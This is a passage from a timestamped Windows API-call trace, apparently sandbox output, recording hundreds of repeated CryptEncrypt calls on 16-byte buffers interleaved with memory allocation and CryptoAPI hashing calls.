Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.510] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.511] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.512] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.512] malloc (_Size=0x1fd) returned 0x3def010 [0157.512] free (_Block=0x0) [0157.512] free (_Block=0x3d81e60) [0157.512] free (_Block=0x606108) [0157.512] malloc (_Size=0x1fd) returned 0x606108 [0157.512] free (_Block=0x0) [0157.512] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.512] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.512] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.512] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.512] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.512] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.512] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.512] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.512] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.513] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.514] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.514] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.514] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.514] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.514] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.514] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.514] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.514] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.514] free (_Block=0x0) [0157.514] free (_Block=0x3def010) [0157.514] malloc (_Size=0x1fd) returned 0x3def010 [0157.514] free (_Block=0x0) [0157.514] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0157.514] CryptHashData (hHash=0x4327f8, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.514] malloc (_Size=0x14) returned 0x3f653c0 [0157.514] free (_Block=0x0) [0157.515] CryptGetHashParam (in: hHash=0x4327f8, dwParam=0x2, pbData=0x3f653c0, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f653c0, pdwDataLen=0x339faec) returned 1 [0157.515] CryptHashData (hHash=0x432c78, pbData=0x3def010, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0157.515] free (_Block=0x3f653c0) [0157.515] CryptDestroyHash (hHash=0x4327f8) returned 1 [0157.515] free (_Block=0x3def010) [0157.515] free (_Block=0x606108) [0157.515] malloc (_Size=0x1fd) returned 0x606108 [0157.515] free (_Block=0x0) [0157.515] malloc (_Size=0x1f2) returned 0x3def010 [0157.515] free (_Block=0x0) [0157.515] malloc (_Size=0x1f2) returned 0x3def210 [0157.515] free (_Block=0x0) [0157.515] free (_Block=0x0) [0157.515] free (_Block=0x3def010) [0157.516] free (_Block=0x3def210) [0157.516] free (_Block=0x606108) [0157.516] free (_Block=0x3d81e60) [0157.516] malloc (_Size=0x1fd) returned 0x606108 [0157.516] free (_Block=0x0) [0157.516] malloc (_Size=0x1fd) returned 0x3d81e60 [0157.516] free (_Block=0x0) [0157.516] free (_Block=0x0) [0157.516] free (_Block=0x606108) [0157.516] malloc (_Size=0x1fd) returned 0x606108 [0157.516] free (_Block=0x0) [0157.516] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.516] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.517] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] CryptEncrypt (in: hKey=0x3e1818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3df05ec*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.518] malloc (_Size=0x1fd) returned 0x3def010 [0157.518] free (_Block=0x0) [0157.519] free (_Block=0x3d81e60) [0157.519] free (_Block=0x606108) [0157.519] malloc (_Size=0x1fd) returned 0x606108 [0157.519] free (_Block=0x0) [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.519] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x339faa4*=0x10) returned 1 [0157.520] CryptEncrypt (in: hKey=0x432a38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, 